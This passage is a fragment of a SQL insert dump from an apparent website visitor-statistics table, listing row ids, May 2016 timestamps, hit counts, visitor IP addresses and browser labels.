'141.8.142.1','other'),(38625,1462815784,1,1,0,0,'92.113.189.168','firefox'),(38626,1462815865,1,1,0,0,'91.196.178.129','other'),(38627,1462818123,1,1,0,0,'130.193.50.34','other'),(38628,1462819894,1,1,0,0,'66.249.78.178','chrome'),(38629,1462821663,1,1,0,0,'91.196.178.162','firefox'),(38630,1462822616,1,1,0,0,'195.34.204.152','chrome'),(38631,1462823895,1,0,1,0,'66.249.78.136',''),(38632,1462824040,3,3,0,0,'193.111.140.153','other'),(38633,1462824535,1,1,0,0,'141.8.132.105','other'),(38634,1462824663,90,90,0,0,'144.76.93.46','other'),(38635,1462825458,1,1,0,0,'141.8.142.1','other'),(38636,1462827466,2,2,0,0,'69.30.198.178','other'),(38637,1462828304,1,1,0,0,'180.76.15.8','other'),(38638,1462828866,1,1,0,0,'5.255.253.113','other'),(38639,1462828988,1,1,0,0,'141.8.183.25','other'),(38640,1462829485,1,0,1,0,'66.249.78.143',''),(38641,1462831555,1,0,1,0,'66.249.78.150',''),(38642,1462832396,2,2,0,0,'130.193.50.34','other'),(38643,1462832655,1,1,0,0,'141.8.132.105','other'),(38644,1462832694,1,1,0,0,'69.30.198.242','other'),(38645,1462838368,1,0,1,0,'66.249.78.143',''),(38646,1462838767,1,1,0,0,'141.8.183.25','other'),(38647,1462838893,1,1,0,0,'141.8.132.105','other'),(38648,1462841221,1,1,0,0,'66.249.78.178','chrome'),(38649,1462842873,1,1,0,0,'141.8.183.25','other'),(38650,1462843000,3,3,0,0,'141.8.132.105','other'),(38651,1462843253,2,2,0,0,'130.193.50.34','other'),(38652,1462846139,1,0,1,0,'66.249.66.76',''),(38653,1462846643,1,1,0,0,'82.145.218.234','other'),(38654,1462846712,1,1,0,0,'141.8.183.25','other'),(38655,1462846838,2,2,0,0,'141.8.132.105','other'),(38656,1462846877,1,0,1,0,'66.249.78.143',''),(38657,1462847677,1,1,0,0,'66.249.78.143','chrome'),(38658,1462849185,1,1,0,0,'157.55.39.16','other'),(38659,1462851025,3,3,0,0,'130.193.50.34','other'),(38660,1462853581,2,2,0,0,'130.193.50.34','other'),(38661,1462853706,1,1,0,0,'130.193.51.83','other'),(38662,1462853965,2,2,0,0,'141.8.132.105','other'),(38663,1462854109,1,1,0,0,'141.8.183.25','other'),(38664,1462855507,32,32,0,0,'192.166.218.214','other'),(38665,1462855807,1,1,0,0,'40.77.167.104','other'),(38666,1462856386,1,1,0,0,'178.94.172.122','chrome'),(38667,1462856685,1,1,0,0,'91.196.178.72','firefox'),(38668,1462857267,2,2,0,0,'130.193.50.34','other'),(38669,1462857522,1,1,0,0,'141.8.183.25','other'),(38670,1462857651,1,1,0,0,'141.8.132.105','other'),(38671,1462857862,1,1,0,0,'91.196.178.68','firefox'),(38672,1462857863,1,1,0,0,'104.132.20.64','chrome'),(38673,1462858083,1,0,1,0,'66.249.78.178',''),(38674,1462858092,1,0,1,0,'66.249.78.136',''),(38675,1462858096,1,1,0,0,'66.249.78.171','chrome'),(38676,1462858097,6,0,6,0,'66.249.66.76',''),(38677,1462858099,1,0,1,0,'66.249.66.79',''),(38678,1462858101,6,0,6,0,'66.249.78.164',''),(38679,1462858126,6,1,5,0,'66.249.78.164',''),(38680,1462858138,2,1,1,0,'66.249.78.164',''),(38681,1462859098,1,1,0,0,'66.249.78.178','chrome'),(38682,1462859595,1,1,0,0,'66.249.93.150','chrome'),(38683,1462860057,1,1,0,0,'66.249.78.164','chrome'),(38684,1462861010,1,1,0,0,'130.193.50.34','other'),(38685,1462861380,2,2,0,0,'141.8.132.105','other'),(38686,1462861634,1,1,0,0,'141.8.132.41','other'),(38687,1462861636,1,1,0,0,'178.154.189.31','other'),(38688,1462861766,1,1,0,0,'5.255.253.9','other'),(38689,1462861983,1,1,0,0,'66.102.8.235','other'),(38690,1462862487,1,1,0,0,'178.154.189.202','other'),(38691,1462863110,1,1,0,0,'82.145.211.203','other'),(38692,1462863665,1,0,1,0,'66.249.66.57',''),(38693,1462863769,1,1,0,0,'157.55.39.16','other'),(38694,1462863775,1,1,0,0,'207.46.13.182','other'),(38695,1462863779,1,1,0,0,'40.77.167.104','other'),(38696,1462864154,2,2,0,0,'91.196.178.67','firefox'),(38697,1462864923,1,1,0,0,'130.193.37.7','other'),(38698,1462865154,1,0,1,0,'66.249.78.164',''),(38699,1462865984,1,1,0,0,'130.193.50.34','other'),(38700,1462866070,1,1,0,0,'91.196.178.67','firefox'),(38701,1462866111,2,2,0,0,'141.8.132.105','other'),(38702,1462866431,1,1,0,0,'91.196.178.66','chrome'),(38703,1462867811,1,1,0,0,'91.196.178.67','firefox'),(38704,1462869340,1,1,0,0,'91.196.178.66','chrome'),(38705,1462870088,1,1,0,0,'46.201.240.112','firefox'),(38706,1462870126,1,1,0,0,'130.193.51.83','other'),(38707,1462870127,4,4,0,0,'130.193.50.34','other'),(38708,1462870383,1,1,0,0,'141.8.183.25','other'),(38709,1462870509,1,1,0,0,'5.255.253.113','other'),(38710,1462870891,1,1,0,0,'141.8.132.105','other'),(38711,1462871269,1,1,0,0,'66.249.78.171','chrome'),(38712,1462872261,1,1,0,0,'91.196.178.37','firefox'),(38713,1462872721,1,1,0,0,'91.196.178.67','firefox'),(38714,1462873656,1,1,0,0,'91.196.178.67','firefox'),(38715,1462874206,1,1,0,0,'141.8.132.101','other'),(38716,1462874210,1,1,0,0,'93.158.152.84','other'),(38717,1462874332,1,1,0,0,'5.255.253.113','other'),(38718,1462874462,1,1,0,0,'141.8.132.105','other'),(38719,1462874591,1,1,0,0,'130.193.50.34','other'),(38720,1462874828,1,1,0,0,'91.196.178.66','firefox'),(38721,1462877310,1,1,0,0,'91.196.178.165','chrome'),(38722,1462877455,1,1,0,0,'141.8.132.101','other'),(38723,1462877592,1,1,0,0,'141.8.142.67','other'),(38724,1462878632,1,1,0,0,'92.112.133.64','chrome'),(38725,1462879114,1,1,0,0,'91.196.178.66','chrome'),(38726,1462881832,1,1,0,0,'141.8.142.85','other'),(38727,1462881833,1,1,0,0,'178.154.189.31','other'),(38728,1462881958,1,1,0,0,'141.8.132.105','other'),(38729,1462882085,1,1,0,0,'93.158.152.84','other'),(38730,1462882210,1,1,0,0,'178.154.189.37','other'),(38731,1462882513,1,1,0,0,'192.166.132.186','chrome'),(38732,1462883116,1,1,0,0,'66.249.78.178','chrome'),(38733,1462883298,1,1,0,0,'91.196.178.72','chrome'),(38734,1462883905,1,1,0,0,'93.80.76.236','msie'),(38735,1462883923,1,1,0,0,'192.166.132.186','chrome'),(38736,1462884570,1,1,0,0,'130.193.50.34','other'),(38737,1462884955,1,1,0,0,'46.164.144.179','firefox'),(38738,1462886295,1,1,0,0,'46.200.42.31','opera'),(38739,1462886896,1,1,0,0,'91.196.178.67','firefox'),(38740,1462888553,1,1,0,0,'91.196.178.72','firefox'),(38741,1462889063,1,1,0,0,'194.44.145.27','chrome'),(38742,1462889184,1,1,0,0,'91.196.178.66','firefox'),(38743,1462889350,249,249,0,0,'174.34.135.242','other'),(38744,1462889931,1,1,0,0,'37.53.231.185','firefox'),(38745,1462890112,1,1,0,0,'91.209.11.170','chrome'),(38746,1462890326,1,1,0,0,'91.196.178.66','firefox'),(38747,1462890382,1,1,0,0,'180.76.15.158','other'),(38748,1462891656,87,87,0,0,'192.166.218.214','other'),(38749,1462892580,109,109,0,0,'192.166.218.214','other'),(38750,1462893485,88,88,0,0,'192.166.218.214','other'),(38751,1462893985,1,1,0,0,'31.128.250.89','chrome'),(38752,1462894072,1,1,0,0,'92.112.12.215','chrome'),(38753,1462894293,1,1,0,0,'37.55.227.236','firefox'),(38754,1462894418,21,21,0,0,'192.166.218.214','other'),(38755,1462894823,1,1,0,0,'66.249.78.143','chrome'),(38756,1462898347,1,0,1,0,'66.249.78.164',''),(38757,1462898401,1,1,0,0,'193.194.127.217','firefox'),(38758,1462899403,1,1,0,0,'93.80.151.129','msie'),(38759,1462899819,1,0,1,0,'66.249.78.136',''),(38760,1462900057,1,1,0,0,'91.226.187.62','other'),(38761,1462902644,1,1,0,0,'66.249.78.143','chrome'),(38762,1462902700,1,0,1,0,'66.249.78.164',''),(38763,1462903780,1,1,0,0,'37.55.227.236','firefox'),(38764,1462903815,50,50,0,0,'51.255.207.26','other'),(38765,1462906630,1,1,0,0,'5.255.253.113','other'),(38766,1462907622,1,1,0,0,'91.196.178.70','firefox'),(38767,1462909063,1,1,0,0,'91.196.178.162','firefox'),(38768,1462910750,1,1,0,0,'64.246.165.210','firefox'),(38769,1462911230,1,1,0,0,'91.196.178.164','opera'),(38770,1462911753,300,300,0,0,'94.23.19.178','other'),(38771,1462911910,1,0,1,0,'66.249.66.60',''),(38772,1462912026,1,0,1,0,'66.249.78.171',''),(38773,1462917235,1,1,0,0,'178.154.189.202','other'),(38774,1462921108,1,1,0,0,'130.193.50.34','other'),(38775,1462922531,50,0,50,0,'65.254.33.195',''),(38776,1462924404,1,1,0,0,'141.8.132.105','other'),(38777,1462927576,1,0,1,0,'66.249.78.136',''),(38778,1462927836,1,1,0,0,'141.8.132.105','other'),(38779,1462928812,1,1,0,0,'178.154.189.202','other'),(38780,1462929488,1,0,1,0,'66.249.78.164',''),(38781,1462931594,1,1,0,0,'130.193.50.34','other'),(38782,1462931722,1,1,0,0,'141.8.183.25','other'),(38783,1462935271,1,1,0,0,'130.193.50.34','other'),(38784,1462936259,1,0,1,0,'66.249.78.171',''),(38785,1462936730,1,0,1,0,'66.249.78.136',''),(38786,1462937479,1,1,0,0,'141.0.15.48','other'),(38787,1462937900,1,1,0,0,'141.8.183.25','other'),(38788,1462938026,1,1,0,0,'141.8.132.105','other'),(38789,1462939945,1,1,0,0,'178.154.189.202','other'),(38790,1462940453,1,1,0,0,'178.154.189.203','other'),(38791,1462947915,1,1,0,0,'91.196.178.70','firefox'),(38792,1462947990,1,1,0,0,'91.196.178.70','chrome'),(38793,1462948093,1,1,0,0,'91.196.178.69','chrome'),(38794,1462948112,1,1,0,0,'130.193.50.34','other'),(38795,1462948236,1,1,0,0,'93.171.185.126','chrome'),(38796,1462948829,1,1,0,0,'94.179.1.67','firefox'),(38797,1462949049,1,1,0,0,'46.151.251.212','other'),(38798,1462949640,1,1,0,0,'92.112.242.115','chrome'),(38799,1462949703,1,1,0,0,'180.76.15.21','other'),(38800,1462949720,1,0,1,0,'68.180.229.171',''),(38801,1462950015,1,1,0,0,'91.196.178.70','chrome'),(38802,1462950222,1,1,0,0,'66.220.145.243','chrome'),(38803,1462951546,1,1,0,0,'66.249.93.153','chrome'),(38804,1462952650,1,1,0,0,'157.55.39.174','other'),(38805,1462952672,1,1,0,0,'91.196.178.70','chrome'),(38806,1462953172,1,1,0,0,'91.196.178.65','firefox'),(38807,1462953842,1,1,0,0,'91.196.178.70','firefox'),(38808,1462954404,1,1,0,0,'93.73.234.193','firefox'),(38809,1462956309,1,1,0,0,'178.93.84.40','chrome'),(38810,1462956591,1,1,0,0,'37.53.148.102','chrome'),(38811,1462958363,1,1,0,0,'66.249.78.164','chrome'),(38812,1462958488,1,1,0,0,'40.77.167.104','other'),(38813,1462959089,1,1,0,0,'91.196.178.70','firefox'),(38814,1462960199,1,1,0,0,'91.196.178.167','chrome'),(38815,1462960213,1,1,0,0,'66.249.78.150','chrome'),(38816,1462961124,1,1,0,0,'40.77.167.104','other'),(38817,1462961329,2,2,0,0,'69.30.198.202','other'),(38818,1462964255,1,1,0,0,'91.196.178.65','firefox'),(38819,1462964418,1,1,0,0,'46.250.25.76','chrome'),(38820,1462964511,1,1,0,0,'178.94.50.159','firefox'),(38821,1462965082,1,1,0,0,'193.109.145.179','chrome'),(38822,1462965170,1,1,0,0,'91.196.178.70','firefox'),(38823,1462965724,1,1,0,0,'130.193.51.19','other'),(38824,1462965850,1,1,0,0,'141.8.132.105','other'),(38825,1462966169,1,1,0,0,'141.0.14.178','other'),(38826,1462966436,1,1,0,0,'157.55.39.72','other'),(38827,1462966521,1,1,0,0,'207.46.13.156','other'),(38828,1462966956,1,1,0,0,'91.196.178.70','firefox'),(38829,1462967649,1,1,0,0,'91.196.178.70','chrome'),(38830,1462968393,1,1,0,0,'91.221.211.233','chrome'),(38831,1462968654,1,1,0,0,'91.196.178.70','firefox'),(38832,1462969484,1,1,0,0,'37.54.56.7','chrome'),(38833,1462970020,1,1,0,0,'94.179.35.85','firefox'),(38834,1462971938,1,1,0,0,'157.55.39.72','other'),(38835,1462972894,1,1,0,0,'94.179.98.97','chrome'),(38836,1462974725,1,1,0,0,'128.69.171.207','chrome'),(38837,1462975560,1,1,0,0,'91.196.178.72','msie'),(38838,1462975602,1,1,0,0,'141.8.132.105','other'),(38839,1462975659,1,1,0,0,'176.77.83.112','opera'),(38840,1462975960,1,1,0,0,'176.77.83.112','msie'),(38841,1462976313,1,1,0,0,'91.196.178.67','firefox'),(38842,1462977482,1,1,0,0,'40.77.167.104','other'),(38843,1462977656,1,1,0,0,'207.46.13.156','other'),(38844,1462978376,1,1,0,0,'178.154.189.202','other'),(38845,1462979729,1,1,0,0,'91.196.178.70','firefox'),(38846,1462981425,2,2,0,0,'5.255.253.113','other'),(38847,1462981505,1,1,0,0,'40.77.167.104','other'),(38848,1462981623,5,5,0,0,'144.76.12.75','other'),(38849,1462984562,1,1,0,0,'180.76.15.19','other'),(38850,1462985677,1,1,0,0,'40.77.167.104','other'),(38851,1462987260,1,1,0,0,'40.77.167.65','other'),(38852,1462987266,1,1,0,0,'207.46.13.156','other'),(38853,1462987273,1,1,0,0,'40.77.167.104','other'),(38854,1462987277,1,1,0,0,'207.46.13.95','other'),(38855,1462988944,2,2,0,0,'93.158.152.84','other'),(38856,1462989070,1,1,0,0,'130.193.50.4','other'),(38857,1462989198,1,1,0,0,'141.8.183.25','other'),(38858,1462989453,1,1,0,0,'130.193.51.45','other'),(38859,1462989456,1,1,0,0,'93.158.152.61','other'),(38860,1462989580,1,1,0,0,'5.255.253.47','other'),(38861,1462991027,1,1,0,0,'92.113.188.104','firefox'),(38862,1462991401,1,1,0,0,'207.46.13.156','other'),(38863,1462998793,1,1,0,0,'66.249.78.164','chrome'),(38864,1463000254,1,1,0,0,'141.8.142.61','other'),(38865,1463000379,1,1,0,0,'130.193.51.19','other'),(38866,1463000508,1,1,0,0,'141.8.132.105','other'),(38867,1463000633,1,1,0,0,'141.8.183.25','other'),(38868,1463001814,1,0,1,0,'66.249.78.171',''),(38869,1463004044,1,1,0,0,'46.133.209.51','other'),(38870,1463005679,1,1,0,0,'176.14.126.176','msie'),(38871,1463005992,1,1,0,0,'141.8.183.25','other'),(38872,1463006121,1,1,0,0,'141.8.132.105','other'),(38873,1463007483,1,1,0,0,'176.77.83.170','opera'),(38874,1463007486,1,1,0,0,'89.178.156.60','msie'),(38875,1463009145,1,1,0,0,'141.8.183.25','other'),(38876,1463009266,1,1,0,0,'130.193.51.83','other'),(38877,1463009397,1,1,0,0,'130.193.51.19','other'),(38878,1463011105,1,1,0,0,'207.46.13.95','other'),(38879,1463012815,1,1,0,0,'66.249.79.215','chrome'),(38880,1463013991,1,1,0,0,'141.0.14.176','other'),(38881,1463014187,1,1,0,0,'130.193.50.34','other'),(38882,1463014319,1,1,0,0,'141.8.183.25','other'),(38883,1463016542,1,1,0,0,'130.193.37.7','other'),(38884,1463018018,1,1,0,0,'178.154.189.37','other'),(38885,1463020691,1,0,1,0,'66.249.79.47',''),(38886,1463023567,1,1,0,0,'207.46.13.95','other'),(38887,1463024959,41,41,0,0,'144.76.29.66','other'),(38888,1463030216,15,15,0,0,'207.46.13.95','other'),(38889,1463030232,17,17,0,0,'207.46.13.156','other'),(38890,1463030250,16,16,0,0,'207.46.13.23','other'),(38891,1463031012,1,1,0,0,'107.21.1.8','other'),(38892,1463031466,1,1,0,0,'91.196.178.167','chrome'),(38893,1463031811,2,2,0,0,'91.196.178.67','firefox'),(38894,1463034205,1,1,0,0,'66.249.93.185','chrome'),(38895,1463035543,1,1,0,0,'188.32.128.85','msie'),(38896,1463037081,1,0,1,0,'66.249.79.49',''),(38897,1463037096,1,1,0,0,'46.201.240.112','firefox'),(38898,1463040280,1,1,0,0,'207.46.13.95','other'),(38899,1463040411,1,1,0,0,'46.211.113.73','other'),(38900,1463040423,1,1,0,0,'130.193.50.34','other'),(38901,1463041199,1,1,0,0,'66.249.79.215','chrome'),(38902,1463042398,1,1,0,0,'66.249.79.208','chrome'),(38903,1463044587,1,1,0,0,'66.249.79.215','chrome'),(38904,1463045036,1,1,0,0,'31.43.8.167','chrome'),(38905,1463045232,1,1,0,0,'66.249.79.201','chrome'),(38906,1463045485,1,1,0,0,'66.249.79.51','chrome'),(38907,1463045555,1,1,0,0,'66.249.79.208','chrome'),(38908,1463046877,1,1,0,0,'91.196.178.66','firefox'),(38909,1463047297,17,17,0,0,'178.255.215.94','other'),(38910,1463049751,1,1,0,0,'213.179.245.35','chrome'),(38911,1463051585,1,1,0,0,'91.196.178.162','firefox'),(38912,1463052358,1,1,0,0,'207.46.13.23','other'),(38913,1463052763,1,1,0,0,'40.77.167.104','other'),(38914,1463052930,1,1,0,0,'31.134.124.253','firefox'),(38915,1463053230,2,2,0,0,'66.249.79.208','chrome'),(38916,1463053344,1,1,0,0,'46.149.176.253','chrome'),(38917,1463053703,1,1,0,0,'213.5.192.111','chrome'),(38918,1463053813,1,1,0,0,'87.244.179.70','firefox'),(38919,1463053970,1,1,0,0,'66.249.79.201','chrome'),(38920,1463054030,1,1,0,0,'91.196.178.65','chrome'),(38921,1463055639,1,1,0,0,'178.92.154.215','chrome'),(38922,1463055924,1,1,0,0,'91.196.178.65','chrome'),(38923,1463056004,1,1,0,0,'157.55.39.234','other'),(38924,1463056210,1,1,0,0,'91.196.178.65','firefox'),(38925,1463057868,1,1,0,0,'91.196.178.167','chrome'),(38926,1463058168,1,1,0,0,'91.196.178.67','firefox'),(38927,1463058374,1,1,0,0,'46.211.24.124','other'),(38928,1463058601,1,1,0,0,'66.249.79.47','chrome'),(38929,1463058615,1,1,0,0,'188.191.47.11','firefox'),(38930,1463058679,1,1,0,0,'178.94.16.243','firefox'),(38931,1463058712,1,1,0,0,'91.196.178.72','chrome'),(38932,1463059216,1,1,0,0,'178.154.189.202','other'),(38933,1463060265,1,1,0,0,'5.3.151.10','opera'),(38934,1463060607,1,1,0,0,'91.196.178.72','chrome'),(38935,1463060694,1,1,0,0,'176.77.107.56','msie'),(38936,1463060839,1,1,0,0,'94.179.209.30','firefox'),(38937,1463061536,1,1,0,0,'94.179.108.40','chrome'),(38938,1463061561,1,1,0,0,'141.8.132.105','other'),(38939,1463061824,1,1,0,0,'91.205.66.194','firefox'),(38940,1463062798,1,1,0,0,'157.55.39.234','other'),(38941,1463062963,1,1,0,0,'91.196.178.65','chrome'),(38942,1463064060,1,1,0,0,'93.74.100.235','chrome'),(38943,1463064536,1,1,0,0,'92.113.191.101','firefox'),(38944,1463064915,1,1,0,0,'91.196.178.71','firefox'),(38945,1463066559,4,4,0,0,'213.239.205.207','other'),(38946,1463066655,1,1,0,0,'157.55.39.234','other'),(38947,1463068827,1,1,0,0,'180.76.15.147','other'),(38948,1463070337,1,1,0,0,'92.113.191.101','firefox'),(38949,1463071445,1,1,0,0,'178.255.215.94','other'),(38950,1463072741,67,67,0,0,'149.202.48.192','other'),(38951,1463072799,1,0,1,0,'66.249.69.180',''),(38952,1463072847,1,1,0,0,'180.76.15.153','other'),(38953,1463074023,1,1,0,0,'66.249.75.32','chrome'),(38954,1463075130,3,3,0,0,'5.9.142.226','other'),(38955,1463077066,1,1,0,0,'37.53.11.75','chrome'),(38956,1463079812,1,1,0,0,'193.194.127.217','firefox'),(38957,1463080751,1,0,1,0,'66.249.75.48',''),(38958,1463080948,2,2,0,0,'62.210.143.245','other'),(38959,1463081695,1,1,0,0,'195.154.199.235','msie'),(38960,1463084681,1,1,0,0,'157.55.39.160','other'),(38961,1463084692,1,1,0,0,'157.55.39.209','other'),(38962,1463084706,1,1,0,0,'91.196.178.72','firefox'),(38963,1463084724,4,4,0,0,'158.69.200.204','other'),(38964,1463086312,1,0,1,0,'66.249.69.180',''),(38965,1463086314,1,0,1,0,'66.249.69.170',''),(38966,1463086315,1,0,1,0,'66.249.69.175',''),(38967,1463089182,1,1,0,0,'141.8.132.105','other'),(38968,1463089559,2,0,2,0,'66.249.75.40',''),(38969,1463089717,63,63,0,0,'157.55.39.209','other'),(38970,1463089736,1,0,1,0,'66.249.69.175',''),(38971,1463089747,57,57,0,0,'157.55.39.160','other'),(38972,1463089960,44,44,0,0,'207.46.13.16','other'),(38973,1463092035,296,296,0,0,'158.69.200.204','other'),(38974,1463092321,1,1,0,0,'176.14.10.153','msie'),(38975,1463092599,1,1,0,0,'37.144.15.73','opera'),(38976,1463093344,1,0,1,0,'66.249.64.113',''),(38977,1463093475,1,0,1,0,'66.249.69.180',''),(38978,1463094281,1,1,0,0,'141.8.183.25','other'),(38979,1463094411,1,1,0,0,'141.8.132.105','other'),(38980,1463094536,1,1,0,0,'178.154.149.10','other'),(38981,1463094789,1,1,0,0,'207.46.13.16','other'),(38982,1463095054,1,1,0,0,'157.55.39.209','other'),(38983,1463096120,1,1,0,0,'88.198.230.79','other'),(38984,1463097928,1,0,1,0,'66.249.69.170',''),(38985,1463098720,1,1,0,0,'178.154.189.203','other'),(38986,1463099025,1,1,0,0,'40.77.167.3','other'),(38987,1463099416,1,1,0,0,'207.46.13.141','other'),(38988,1463100007,1,1,0,0,'66.249.69.170','chrome'),(38989,1463100025,1,1,0,0,'40.77.167.3','other'),(38990,1463101902,3,3,0,0,'130.193.50.34','other'),(38991,1463102323,1,0,1,0,'66.249.69.170',''),(38992,1463102763,1,0,1,0,'66.249.75.32',''),(38993,1463105242,1,1,0,0,'130.193.50.34','other'),(38994,1463105671,1,0,1,0,'66.249.75.32',''),(38995,1463106116,1,1,0,0,'40.77.167.3','other'),(38996,1463106449,78,78,0,0,'178.63.86.11','other'),(38997,1463107900,1,0,1,0,'66.249.69.175',''),(38998,1463108104,1,0,1,0,'66.249.69.180',''),(38999,1463108809,1,1,0,0,'130.193.50.34','other'),(39000,1463108887,3,3,0,0,'69.30.211.2','other'),(39001,1463109769,1,1,0,0,'82.145.216.139','other'),(39002,1463111966,2,0,2,0,'66.249.69.175',''),(39003,1463113250,1,0,1,0,'66.249.69.180',''),(39004,1463113269,1,0,1,0,'66.249.69.175',''),(39005,1463113594,1,1,0,0,'91.196.178.70','chrome'),(39006,1463116606,1,1,0,0,'66.249.93.187','chrome'),(39007,1463116818,1,0,1,0,'66.249.69.180',''),(39008,1463116860,2,2,0,0,'52.3.127.144','other'),(39009,1463118423,1,1,0,0,'141.8.183.25','other'),(39010,1463118480,1,1,0,0,'82.207.91.234','firefox'),(39011,1463119405,1,1,0,0,'178.154.189.202','other'),(39012,1463120378,1,0,1,0,'66.249.75.48',''),(39013,1463121229,1,0,1,0,'66.249.75.40',''),(39014,1463121697,1,1,0,0,'178.93.45.118','firefox'),(39015,1463121925,1,1,0,0,'130.193.51.79','other'),(39016,1463122050,1,1,0,0,'130.193.50.34','other'),(39017,1463122452,1,0,1,0,'66.249.69.170',''),(39018,1463124479,5,5,0,0,'69.30.198.186','other'),(39019,1463125324,2,0,2,0,'66.249.69.180',''),(39020,1463125714,1,0,1,0,'66.249.69.175',''),(39021,1463126114,2,2,0,0,'130.193.50.34','other'),(39022,1463126508,2,2,0,0,'46.201.239.218','firefox'),(39023,1463126700,4,4,0,0,'141.8.183.25','other'),(39024,1463127055,2,2,0,0,'130.193.50.34','other'),(39025,1463127687,2,2,0,0,'141.8.183.25','other'),(39026,1463127784,1,1,0,0,'37.53.228.202','firefox'),(39027,1463127812,1,1,0,0,'5.255.253.113','other'),(39028,1463128516,1,1,0,0,'207.46.13.141','other'),(39029,1463128935,1,0,1,0,'66.249.69.170',''),(39030,1463130078,1,0,1,0,'66.249.69.170',''),(39031,1463131193,1,1,0,0,'46.201.239.218','firefox'),(39032,1463132785,1,1,0,0,'46.133.108.187','other'),(39033,1463132791,1,1,0,0,'130.193.50.34','other'),(39034,1463132831,1,1,0,0,'130.193.51.83','other'),(39035,1463133042,1,1,0,0,'91.196.178.70','firefox'),(39036,1463133068,1,0,1,0,'66.249.69.170',''),(39037,1463134261,1,1,0,0,'91.196.178.70','firefox'),(39038,1463134586,1,1,0,0,'37.53.228.202','firefox'),(39039,1463135889,6,0,6,0,'66.249.69.170',''),(39040,1463135892,2,0,2,0,'66.249.69.175',''),(39041,1463136568,1,1,0,0,'66.249.69.180','chrome'),(39042,1463136960,2,2,0,0,'66.249.69.170','chrome'),(39043,1463137334,1,1,0,0,'66.249.69.175','chrome'),(39044,1463138124,1,1,0,0,'46.188.98.118','msie'),(39045,1463138139,3,3,0,0,'66.249.69.170','chrome'),(39046,1463138568,1,1,0,0,'52.3.127.144','other'),(39047,1463138706,1,1,0,0,'91.196.178.69','firefox'),(39048,1463138977,1,1,0,0,'207.46.13.97','other'),(39049,1463139579,1,1,0,0,'91.192.132.242','chrome'),(39050,1463139585,1,1,0,0,'130.193.50.34','other'),(39051,1463139933,1,1,0,0,'207.46.13.141','other'),(39052,1463140175,1,1,0,0,'157.55.39.182','other'),(39053,1463140957,1,1,0,0,'130.193.50.34','other'),(39054,1463142362,1,0,1,0,'66.249.75.48',''),(39055,1463142442,4,4,0,0,'130.193.50.34','other'),(39056,1463143430,1,1,0,0,'141.8.142.85','other'),(39057,1463143539,1,1,0,0,'37.53.228.202','firefox'),(39058,1463143684,1,1,0,0,'5.255.253.113','other'),(39059,1463144069,1,1,0,0,'141.8.132.105','other'),(39060,1463144233,1,1,0,0,'92.113.191.101','firefox'),(39061,1463144698,1,0,1,0,'66.249.65.104',''),(39062,1463144764,1,1,0,0,'91.196.178.71','chrome'),(39063,1463146325,1,1,0,0,'91.196.178.161','chrome'),(39064,1463146543,3,3,0,0,'141.8.132.105','other'),(39065,1463146547,1,1,0,0,'37.204.107.203','msie'),(39066,1463146688,1,1,0,0,'5.255.253.113','other'),(39067,1463146859,3,3,0,0,'130.193.51.83','other'),(39068,1463146970,4,4,0,0,'130.193.50.34','other'),(39069,1463147491,2,2,0,0,'141.8.132.105','other'),(39070,1463149062,1,1,0,0,'92.113.191.101','firefox'),(39071,1463149617,1,1,0,0,'52.3.105.23','other'),(39072,1463151077,2,0,2,0,'66.249.65.124',''),(39073,1463151536,1,1,0,0,'91.196.178.35','firefox'),(39074,1463151945,1,1,0,0,'144.76.93.46','other'),(39075,1463151951,5,5,0,0,'130.193.50.34','other'),(39076,1463151955,2,2,0,0,'141.8.132.105','other'),(39077,1463151987,1,1,0,0,'52.3.127.144','other'),(39078,1463152443,1,1,0,0,'141.8.183.25','other'),(39079,1463152568,1,1,0,0,'5.255.253.113','other'),(39080,1463152715,1,1,0,0,'52.3.105.23','other'),(39081,1463153269,5,0,5,0,'66.249.65.121',''),(39082,1463153281,4,0,4,0,'66.249.65.118',''),(39083,1463153283,1,0,1,0,'66.249.65.124',''),(39084,1463153437,1,0,1,0,'66.249.65.107',''),(39085,1463153545,1,1,0,0,'141.8.132.105','other'),(39086,1463153674,1,1,0,0,'130.193.51.19','other'),(39087,1463153801,1,1,0,0,'5.255.253.113','other'),(39088,1463154325,1,1,0,0,'178.94.172.113','chrome'),(39089,1463154588,1,1,0,0,'66.249.65.118','chrome'),(39090,1463155061,1,1,0,0,'92.113.191.101','firefox'),(39091,1463155693,1,1,0,0,'130.193.50.34','other'),(39092,1463155750,1,1,0,0,'178.94.172.113','chrome'),(39093,1463158309,2,2,0,0,'130.193.50.34','other'),(39094,1463159307,1,0,1,0,'66.249.65.101',''),(39095,1463160181,1,1,0,0,'92.113.191.101','firefox'),(39096,1463160335,1,0,1,0,'66.249.65.124',''),(39097,1463160836,2,2,0,0,'141.8.132.105','other'),(39098,1463161031,2,2,0,0,'130.193.50.34','other'),(39099,1463161324,1,1,0,0,'176.193.169.52','chrome'),(39100,1463161419,1,1,0,0,'141.8.183.25','other'),(39101,1463161455,1,1,0,0,'52.3.127.144','other'),(39102,1463161544,1,1,0,0,'180.76.15.146','other'),(39103,1463161777,1,1,0,0,'141.8.132.105','other'),(39104,1463162158,2,2,0,0,'52.3.105.23','other'),(39105,1463162281,1,1,0,0,'46.242.121.141','firefox'),(39106,1463162612,1,1,0,0,'157.55.39.63','other'),(39107,1463162810,1,1,0,0,'193.194.127.217','firefox'),(39108,1463163621,1,1,0,0,'141.8.142.58','other'),(39109,1463163755,1,1,0,0,'93.158.152.26','other'),(39110,1463163891,2,2,0,0,'5.255.253.113','other'),(39111,1463163930,1,1,0,0,'207.46.13.97','other'),(39112,1463164016,1,1,0,0,'130.193.50.34','other'),(39113,1463164275,1,1,0,0,'5.255.253.9','other'),(39114,1463164402,1,1,0,0,'130.193.51.81','other'),(39115,1463165052,1,1,0,0,'91.196.178.40','chrome'),(39116,1463165232,1,1,0,0,'66.249.65.107','chrome'),(39117,1463167447,1,1,0,0,'66.249.65.121','chrome'),(39118,1463167778,1,1,0,0,'141.8.132.83','other'),(39119,1463167905,3,3,0,0,'130.193.50.34','other'),(39120,1463168037,1,1,0,0,'141.8.132.105','other'),(39121,1463168165,1,1,0,0,'178.154.189.31','other'),(39122,1463168228,2,2,0,0,'89.19.7.58','firefox'),(39123,1463168436,1,1,0,0,'130.193.51.19','other'),(39124,1463168562,1,1,0,0,'141.8.132.101','other'),(39125,1463170928,1,1,0,0,'52.3.105.23','other'),(39126,1463171081,1,0,1,0,'66.249.65.118',''),(39127,1463171139,1,0,1,0,'66.249.65.107',''),(39128,1463173801,1,1,0,0,'5.255.253.113','other'),(39129,1463173934,1,1,0,0,'141.8.183.25','other'),(39130,1463174064,1,1,0,0,'130.193.50.34','other'),(39131,1463179241,1,0,1,0,'66.249.65.101',''),(39132,14631793